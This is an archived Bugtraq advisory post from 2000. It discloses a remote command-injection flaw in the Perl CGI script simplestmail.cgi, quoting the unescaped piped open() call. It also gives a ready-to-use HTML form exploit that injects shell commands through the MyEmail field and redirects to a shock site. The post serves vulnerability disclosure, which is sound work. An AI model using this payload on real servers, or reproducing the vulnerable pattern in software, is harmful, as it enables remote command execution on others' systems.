[18028] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Insecure input validation in simplestmail.cgi (remote command

daemon@ATHENA.MIT.EDU (rpc)
Tue Dec 12 16:43:38 2000

Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
Message-Id:  <20001211224440.C505E24C504@lists.securityfocus.com>
Date:         Mon, 11 Dec 2000 14:46:39 GMT
Reply-To: rpc <h@ckz.org>
From: rpc <h@CKZ.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM

Hi Again,

simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif Wright.

It's available from:
http://www.conservatives.net/atheist/scripts/index.html?simplestmail

The code is self explanatory:

----code snippet----
$youremail = $contents_by_name{'MyEmail'};
open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";
-----------------

Exploitation is straight forward:

<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>


--rpc


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[18028] in bugtraq

Insecure input validation in simplestmail.cgi (remote command

daemon@ATHENA.MIT.EDU (rpc)Tue Dec 12 16:43:38 2000

daemon@ATHENA.MIT.EDU (rpc)
Tue Dec 12 16:43:38 2000